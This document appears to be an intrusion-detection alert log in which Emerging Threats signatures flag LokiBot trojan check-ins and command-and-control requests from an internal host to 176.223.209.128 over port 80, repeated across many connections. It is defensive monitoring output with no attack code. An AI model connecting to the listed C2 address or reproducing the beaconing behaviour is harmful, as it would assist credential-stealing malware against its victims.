11/25/21-10:52:01.143885	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50298	80	192.168.11.20	176.223.209.128
11/25/21-10:52:01.143885	TCP	2025381	ET TROJAN LokiBot Checkin	50298	80	192.168.11.20	176.223.209.128
11/25/21-10:52:01.143885	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50298	80	192.168.11.20	176.223.209.128
11/25/21-10:52:01.658061	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50299	80	192.168.11.20	176.223.209.128
11/25/21-10:52:01.658061	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50299	80	192.168.11.20	176.223.209.128
11/25/21-10:52:01.658061	TCP	2025381	ET TROJAN LokiBot Checkin	50299	80	192.168.11.20	176.223.209.128
11/25/21-10:52:01.658061	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50299	80	192.168.11.20	176.223.209.128
11/25/21-10:52:02.188969	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50300	80	192.168.11.20	176.223.209.128
11/25/21-10:52:02.188969	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50300	80	192.168.11.20	176.223.209.128
11/25/21-10:52:02.188969	TCP	2025381	ET TROJAN LokiBot Checkin	50300	80	192.168.11.20	176.223.209.128
11/25/21-10:52:02.188969	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50300	80	192.168.11.20	176.223.209.128
11/25/21-10:52:02.707521	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50301	80	192.168.11.20	176.223.209.128
11/25/21-10:52:02.707521	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50301	80	192.168.11.20	176.223.209.128
11/25/21-10:52:02.707521	TCP	2025381	ET TROJAN LokiBot Checkin	50301	80	192.168.11.20	176.223.209.128
11/25/21-10:52:02.707521	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50301	80	192.168.11.20	176.223.209.128
11/25/21-10:52:03.225980	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50302	80	192.168.11.20	176.223.209.128
11/25/21-10:52:03.225980	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50302	80	192.168.11.20	176.223.209.128
11/25/21-10:52:03.225980	TCP	2025381	ET TROJAN LokiBot Checkin	50302	80	192.168.11.20	176.223.209.128
11/25/21-10:52:03.225980	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50302	80	192.168.11.20	176.223.209.128
11/25/21-10:52:03.735458	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50303	80	192.168.11.20	176.223.209.128
11/25/21-10:52:03.735458	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50303	80	192.168.11.20	176.223.209.128
11/25/21-10:52:03.735458	TCP	2025381	ET TROJAN LokiBot Checkin	50303	80	192.168.11.20	176.223.209.128
11/25/21-10:52:03.735458	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50303	80	192.168.11.20	176.223.209.128
11/25/21-10:52:04.214606	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50304	80	192.168.11.20	176.223.209.128
11/25/21-10:52:04.214606	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50304	80	192.168.11.20	176.223.209.128
11/25/21-10:52:04.214606	TCP	2025381	ET TROJAN LokiBot Checkin	50304	80	192.168.11.20	176.223.209.128
11/25/21-10:52:04.214606	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50304	80	192.168.11.20	176.223.209.128
11/25/21-10:52:04.684538	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50305	80	192.168.11.20	176.223.209.128
11/25/21-10:52:04.684538	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50305	80	192.168.11.20	176.223.209.128
11/25/21-10:52:04.684538	TCP	2025381	ET TROJAN LokiBot Checkin	50305	80	192.168.11.20	176.223.209.128
11/25/21-10:52:04.684538	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50305	80	192.168.11.20	176.223.209.128
11/25/21-10:52:05.176481	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50306	80	192.168.11.20	176.223.209.128
11/25/21-10:52:05.176481	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50306	80	192.168.11.20	176.223.209.128
11/25/21-10:52:05.176481	TCP	2025381	ET TROJAN LokiBot Checkin	50306	80	192.168.11.20	176.223.209.128
11/25/21-10:52:05.176481	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50306	80	192.168.11.20	176.223.209.128
11/25/21-10:52:05.687914	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50307	80	192.168.11.20	176.223.209.128
11/25/21-10:52:05.687914	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50307	80	192.168.11.20	176.223.209.128
11/25/21-10:52:05.687914	TCP	2025381	ET TROJAN LokiBot Checkin	50307	80	192.168.11.20	176.223.209.128
11/25/21-10:52:05.687914	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50307	80	192.168.11.20	176.223.209.128
11/25/21-10:52:06.226743	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50308	80	192.168.11.20	176.223.209.128
11/25/21-10:52:06.226743	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50308	80	192.168.11.20	176.223.209.128
11/25/21-10:52:06.226743	TCP	2025381	ET TROJAN LokiBot Checkin	50308	80	192.168.11.20	176.223.209.128
11/25/21-10:52:06.226743	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50308	80	192.168.11.20	176.223.209.128
11/25/21-10:52:06.742992	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50309	80	192.168.11.20	176.223.209.128
11/25/21-10:52:06.742992	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50309	80	192.168.11.20	176.223.209.128
11/25/21-10:52:06.742992	TCP	2025381	ET TROJAN LokiBot Checkin	50309	80	192.168.11.20	176.223.209.128
11/25/21-10:52:06.742992	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50309	80	192.168.11.20	176.223.209.128
11/25/21-10:52:07.216253	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50310	80	192.168.11.20	176.223.209.128
11/25/21-10:52:07.216253	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50310	80	192.168.11.20	176.223.209.128
11/25/21-10:52:07.216253	TCP	2025381	ET TROJAN LokiBot Checkin	50310	80	192.168.11.20	176.223.209.128
11/25/21-10:52:07.216253	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50310	80	192.168.11.20	176.223.209.128
11/25/21-10:52:07.736750	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50311	80	192.168.11.20	176.223.209.128
11/25/21-10:52:07.736750	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50311	80	192.168.11.20	176.223.209.128
11/25/21-10:52:07.736750	TCP	2025381	ET TROJAN LokiBot Checkin	50311	80	192.168.11.20	176.223.209.128
11/25/21-10:52:07.736750	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50311	80	192.168.11.20	176.223.209.128
11/25/21-10:52:08.228884	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50312	80	192.168.11.20	176.223.209.128
11/25/21-10:52:08.228884	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50312	80	192.168.11.20	176.223.209.128
11/25/21-10:52:08.228884	TCP	2025381	ET TROJAN LokiBot Checkin	50312	80	192.168.11.20	176.223.209.128
11/25/21-10:52:08.228884	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50312	80	192.168.11.20	176.223.209.128
11/25/21-10:52:08.719767	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50313	80	192.168.11.20	176.223.209.128
11/25/21-10:52:08.719767	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50313	80	192.168.11.20	176.223.209.128
11/25/21-10:52:08.719767	TCP	2025381	ET TROJAN LokiBot Checkin	50313	80	192.168.11.20	176.223.209.128
11/25/21-10:52:08.719767	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50313	80	192.168.11.20	176.223.209.128
11/25/21-10:52:09.223409	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50314	80	192.168.11.20	176.223.209.128
11/25/21-10:52:09.223409	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50314	80	192.168.11.20	176.223.209.128
11/25/21-10:52:09.223409	TCP	2025381	ET TROJAN LokiBot Checkin	50314	80	192.168.11.20	176.223.209.128
11/25/21-10:52:09.223409	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50314	80	192.168.11.20	176.223.209.128
11/25/21-10:52:09.728246	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50315	80	192.168.11.20	176.223.209.128
11/25/21-10:52:09.728246	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50315	80	192.168.11.20	176.223.209.128
11/25/21-10:52:09.728246	TCP	2025381	ET TROJAN LokiBot Checkin	50315	80	192.168.11.20	176.223.209.128
11/25/21-10:52:09.728246	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50315	80	192.168.11.20	176.223.209.128
11/25/21-10:52:10.154549	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50316	80	192.168.11.20	176.223.209.128
11/25/21-10:52:10.154549	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50316	80	192.168.11.20	176.223.209.128
11/25/21-10:52:10.154549	TCP	2025381	ET TROJAN LokiBot Checkin	50316	80	192.168.11.20	176.223.209.128
11/25/21-10:52:10.154549	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50316	80	192.168.11.20	176.223.209.128
11/25/21-10:52:10.673271	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50317	80	192.168.11.20	176.223.209.128
11/25/21-10:52:10.673271	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50317	80	192.168.11.20	176.223.209.128
11/25/21-10:52:10.673271	TCP	2025381	ET TROJAN LokiBot Checkin	50317	80	192.168.11.20	176.223.209.128
11/25/21-10:52:10.673271	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50317	80	192.168.11.20	176.223.209.128
11/25/21-10:52:11.194120	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50318	80	192.168.11.20	176.223.209.128
11/25/21-10:52:11.194120	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50318	80	192.168.11.20	176.223.209.128
11/25/21-10:52:11.194120	TCP	2025381	ET TROJAN LokiBot Checkin	50318	80	192.168.11.20	176.223.209.128
11/25/21-10:52:11.194120	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50318	80	192.168.11.20	176.223.209.128
11/25/21-10:52:11.717969	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50319	80	192.168.11.20	176.223.209.128
11/25/21-10:52:11.717969	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50319	80	192.168.11.20	176.223.209.128
11/25/21-10:52:11.717969	TCP	2025381	ET TROJAN LokiBot Checkin	50319	80	192.168.11.20	176.223.209.128
11/25/21-10:52:11.717969	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50319	80	192.168.11.20	176.223.209.128
11/25/21-10:52:12.234683	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50320	80	192.168.11.20	176.223.209.128
11/25/21-10:52:12.234683	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50320	80	192.168.11.20	176.223.209.128
11/25/21-10:52:12.234683	TCP	2025381	ET TROJAN LokiBot Checkin	50320	80	192.168.11.20	176.223.209.128
11/25/21-10:52:12.234683	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50320	80	192.168.11.20	176.223.209.128
11/25/21-10:52:12.694839	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50321	80	192.168.11.20	176.223.209.128
11/25/21-10:52:12.694839	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50321	80	192.168.11.20	176.223.209.128
11/25/21-10:52:12.694839	TCP	2025381	ET TROJAN LokiBot Checkin	50321	80	192.168.11.20	176.223.209.128
11/25/21-10:52:12.694839	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50321	80	192.168.11.20	176.223.209.128
11/25/21-10:52:13.182188	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50322	80	192.168.11.20	176.223.209.128
11/25/21-10:52:13.182188	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50322	80	192.168.11.20	176.223.209.128
11/25/21-10:52:13.182188	TCP	2025381	ET TROJAN LokiBot Checkin	50322	80	192.168.11.20	176.223.209.128
11/25/21-10:52:13.182188	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50322	80	192.168.11.20	176.223.209.128
11/25/21-10:52:13.677236	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50323	80	192.168.11.20	176.223.209.128
11/25/21-10:52:13.677236	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50323	80	192.168.11.20	176.223.209.128
11/25/21-10:52:13.677236	TCP	2025381	ET TROJAN LokiBot Checkin	50323	80	192.168.11.20	176.223.209.128
11/25/21-10:52:13.677236	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50323	80	192.168.11.20	176.223.209.128
11/25/21-10:52:14.189707	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50324	80	192.168.11.20	176.223.209.128
11/25/21-10:52:14.189707	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50324	80	192.168.11.20	176.223.209.128
11/25/21-10:52:14.189707	TCP	2025381	ET TROJAN LokiBot Checkin	50324	80	192.168.11.20	176.223.209.128
11/25/21-10:52:14.189707	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50324	80	192.168.11.20	176.223.209.128
11/25/21-10:52:14.713650	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50325	80	192.168.11.20	176.223.209.128
11/25/21-10:52:14.713650	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50325	80	192.168.11.20	176.223.209.128
11/25/21-10:52:14.713650	TCP	2025381	ET TROJAN LokiBot Checkin	50325	80	192.168.11.20	176.223.209.128
11/25/21-10:52:14.713650	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50325	80	192.168.11.20	176.223.209.128
11/25/21-10:52:15.234438	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50326	80	192.168.11.20	176.223.209.128
11/25/21-10:52:15.234438	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50326	80	192.168.11.20	176.223.209.128
11/25/21-10:52:15.234438	TCP	2025381	ET TROJAN LokiBot Checkin	50326	80	192.168.11.20	176.223.209.128
11/25/21-10:52:15.234438	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50326	80	192.168.11.20	176.223.209.128
11/25/21-10:52:15.707321	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50327	80	192.168.11.20	176.223.209.128
11/25/21-10:52:15.707321	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50327	80	192.168.11.20	176.223.209.128
11/25/21-10:52:15.707321	TCP	2025381	ET TROJAN LokiBot Checkin	50327	80	192.168.11.20	176.223.209.128
11/25/21-10:52:15.707321	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50327	80	192.168.11.20	176.223.209.128
11/25/21-10:52:16.204603	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50328	80	192.168.11.20	176.223.209.128
11/25/21-10:52:16.204603	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50328	80	192.168.11.20	176.223.209.128
11/25/21-10:52:16.204603	TCP	2025381	ET TROJAN LokiBot Checkin	50328	80	192.168.11.20	176.223.209.128
11/25/21-10:52:16.204603	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50328	80	192.168.11.20	176.223.209.128
11/25/21-10:52:16.719602	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50329	80	192.168.11.20	176.223.209.128
11/25/21-10:52:16.719602	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50329	80	192.168.11.20	176.223.209.128
11/25/21-10:52:16.719602	TCP	2025381	ET TROJAN LokiBot Checkin	50329	80	192.168.11.20	176.223.209.128
11/25/21-10:52:16.719602	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50329	80	192.168.11.20	176.223.209.128
11/25/21-10:52:17.227829	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50330	80	192.168.11.20	176.223.209.128
11/25/21-10:52:17.227829	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50330	80	192.168.11.20	176.223.209.128
11/25/21-10:52:17.227829	TCP	2025381	ET TROJAN LokiBot Checkin	50330	80	192.168.11.20	176.223.209.128
11/25/21-10:52:17.227829	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50330	80	192.168.11.20	176.223.209.128
11/25/21-10:52:17.758848	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50331	80	192.168.11.20	176.223.209.128
11/25/21-10:52:17.758848	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50331	80	192.168.11.20	176.223.209.128
11/25/21-10:52:17.758848	TCP	2025381	ET TROJAN LokiBot Checkin	50331	80	192.168.11.20	176.223.209.128
11/25/21-10:52:17.758848	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50331	80	192.168.11.20	176.223.209.128
11/25/21-10:52:18.265321	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50332	80	192.168.11.20	176.223.209.128
11/25/21-10:52:18.265321	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50332	80	192.168.11.20	176.223.209.128
11/25/21-10:52:18.265321	TCP	2025381	ET TROJAN LokiBot Checkin	50332	80	192.168.11.20	176.223.209.128
11/25/21-10:52:18.265321	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50332	80	192.168.11.20	176.223.209.128
11/25/21-10:52:18.757231	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50333	80	192.168.11.20	176.223.209.128
11/25/21-10:52:18.757231	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50333	80	192.168.11.20	176.223.209.128
11/25/21-10:52:18.757231	TCP	2025381	ET TROJAN LokiBot Checkin	50333	80	192.168.11.20	176.223.209.128
11/25/21-10:52:18.757231	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50333	80	192.168.11.20	176.223.209.128
11/25/21-10:52:19.260157	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50334	80	192.168.11.20	176.223.209.128
11/25/21-10:52:19.260157	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50334	80	192.168.11.20	176.223.209.128
11/25/21-10:52:19.260157	TCP	2025381	ET TROJAN LokiBot Checkin	50334	80	192.168.11.20	176.223.209.128
11/25/21-10:52:19.260157	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50334	80	192.168.11.20	176.223.209.128
11/25/21-10:52:19.780978	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50335	80	192.168.11.20	176.223.209.128
11/25/21-10:52:19.780978	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50335	80	192.168.11.20	176.223.209.128
11/25/21-10:52:19.780978	TCP	2025381	ET TROJAN LokiBot Checkin	50335	80	192.168.11.20	176.223.209.128
11/25/21-10:52:19.780978	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50335	80	192.168.11.20	176.223.209.128
11/25/21-10:52:20.285330	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50336	80	192.168.11.20	176.223.209.128
11/25/21-10:52:20.285330	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50336	80	192.168.11.20	176.223.209.128
11/25/21-10:52:20.285330	TCP	2025381	ET TROJAN LokiBot Checkin	50336	80	192.168.11.20	176.223.209.128
11/25/21-10:52:20.285330	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50336	80	192.168.11.20	176.223.209.128
11/25/21-10:52:20.716730	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50337	80	192.168.11.20	176.223.209.128
11/25/21-10:52:20.716730	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50337	80	192.168.11.20	176.223.209.128
11/25/21-10:52:20.716730	TCP	2025381	ET TROJAN LokiBot Checkin	50337	80	192.168.11.20	176.223.209.128
11/25/21-10:52:20.716730	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50337	80	192.168.11.20	176.223.209.128
11/25/21-10:52:21.237790	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50338	80	192.168.11.20	176.223.209.128
11/25/21-10:52:21.237790	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50338	80	192.168.11.20	176.223.209.128
11/25/21-10:52:21.237790	TCP	2025381	ET TROJAN LokiBot Checkin	50338	80	192.168.11.20	176.223.209.128
11/25/21-10:52:21.237790	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50338	80	192.168.11.20	176.223.209.128
11/25/21-10:52:21.714998	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50339	80	192.168.11.20	176.223.209.128
11/25/21-10:52:21.714998	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50339	80	192.168.11.20	176.223.209.128
11/25/21-10:52:21.714998	TCP	2025381	ET TROJAN LokiBot Checkin	50339	80	192.168.11.20	176.223.209.128
11/25/21-10:52:21.714998	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50339	80	192.168.11.20	176.223.209.128
11/25/21-10:52:22.226975	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50340	80	192.168.11.20	176.223.209.128
11/25/21-10:52:22.226975	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50340	80	192.168.11.20	176.223.209.128
11/25/21-10:52:22.226975	TCP	2025381	ET TROJAN LokiBot Checkin	50340	80	192.168.11.20	176.223.209.128
11/25/21-10:52:22.226975	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50340	80	192.168.11.20	176.223.209.128
11/25/21-10:52:22.744389	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50341	80	192.168.11.20	176.223.209.128
11/25/21-10:52:22.744389	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50341	80	192.168.11.20	176.223.209.128
11/25/21-10:52:22.744389	TCP	2025381	ET TROJAN LokiBot Checkin	50341	80	192.168.11.20	176.223.209.128
11/25/21-10:52:22.744389	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50341	80	192.168.11.20	176.223.209.128
11/25/21-10:52:23.270426	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50342	80	192.168.11.20	176.223.209.128
11/25/21-10:52:23.270426	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50342	80	192.168.11.20	176.223.209.128
11/25/21-10:52:23.270426	TCP	2025381	ET TROJAN LokiBot Checkin	50342	80	192.168.11.20	176.223.209.128
11/25/21-10:52:23.270426	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50342	80	192.168.11.20	176.223.209.128
11/25/21-10:52:23.770525	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50343	80	192.168.11.20	176.223.209.128
11/25/21-10:52:23.770525	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50343	80	192.168.11.20	176.223.209.128
11/25/21-10:52:23.770525	TCP	2025381	ET TROJAN LokiBot Checkin	50343	80	192.168.11.20	176.223.209.128
11/25/21-10:52:23.770525	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50343	80	192.168.11.20	176.223.209.128
11/25/21-10:52:24.270030	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50344	80	192.168.11.20	176.223.209.128
11/25/21-10:52:24.270030	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50344	80	192.168.11.20	176.223.209.128
11/25/21-10:52:24.270030	TCP	2025381	ET TROJAN LokiBot Checkin	50344	80	192.168.11.20	176.223.209.128
11/25/21-10:52:24.270030	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50344	80	192.168.11.20	176.223.209.128
11/25/21-10:52:24.703353	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50345	80	192.168.11.20	176.223.209.128
11/25/21-10:52:24.703353	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50345	80	192.168.11.20	176.223.209.128
11/25/21-10:52:24.703353	TCP	2025381	ET TROJAN LokiBot Checkin	50345	80	192.168.11.20	176.223.209.128
11/25/21-10:52:24.703353	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50345	80	192.168.11.20	176.223.209.128
11/25/21-10:52:25.197758	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50346	80	192.168.11.20	176.223.209.128
11/25/21-10:52:25.197758	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50346	80	192.168.11.20	176.223.209.128
11/25/21-10:52:25.197758	TCP	2025381	ET TROJAN LokiBot Checkin	50346	80	192.168.11.20	176.223.209.128
11/25/21-10:52:25.197758	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50346	80	192.168.11.20	176.223.209.128
11/25/21-10:52:25.690005	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50347	80	192.168.11.20	176.223.209.128
11/25/21-10:52:25.690005	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50347	80	192.168.11.20	176.223.209.128
11/25/21-10:52:25.690005	TCP	2025381	ET TROJAN LokiBot Checkin	50347	80	192.168.11.20	176.223.209.128
11/25/21-10:52:25.690005	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50347	80	192.168.11.20	176.223.209.128
11/25/21-10:52:26.225157	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50348	80	192.168.11.20	176.223.209.128
11/25/21-10:52:26.225157	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50348	80	192.168.11.20	176.223.209.128
11/25/21-10:52:26.225157	TCP	2025381	ET TROJAN LokiBot Checkin	50348	80	192.168.11.20	176.223.209.128
11/25/21-10:52:26.225157	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50348	80	192.168.11.20	176.223.209.128
11/25/21-10:52:26.744009	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50349	80	192.168.11.20	176.223.209.128
11/25/21-10:52:26.744009	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50349	80	192.168.11.20	176.223.209.128
11/25/21-10:52:26.744009	TCP	2025381	ET TROJAN LokiBot Checkin	50349	80	192.168.11.20	176.223.209.128
11/25/21-10:52:26.744009	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50349	80	192.168.11.20	176.223.209.128
11/25/21-10:52:27.252180	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50350	80	192.168.11.20	176.223.209.128
11/25/21-10:52:27.252180	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50350	80	192.168.11.20	176.223.209.128
11/25/21-10:52:27.252180	TCP	2025381	ET TROJAN LokiBot Checkin	50350	80	192.168.11.20	176.223.209.128
11/25/21-10:52:27.252180	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50350	80	192.168.11.20	176.223.209.128
11/25/21-10:52:27.764927	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50351	80	192.168.11.20	176.223.209.128
11/25/21-10:52:27.764927	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50351	80	192.168.11.20	176.223.209.128
11/25/21-10:52:27.764927	TCP	2025381	ET TROJAN LokiBot Checkin	50351	80	192.168.11.20	176.223.209.128
11/25/21-10:52:27.764927	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50351	80	192.168.11.20	176.223.209.128
11/25/21-10:52:28.263374	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50352	80	192.168.11.20	176.223.209.128
11/25/21-10:52:28.263374	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50352	80	192.168.11.20	176.223.209.128
11/25/21-10:52:28.263374	TCP	2025381	ET TROJAN LokiBot Checkin	50352	80	192.168.11.20	176.223.209.128
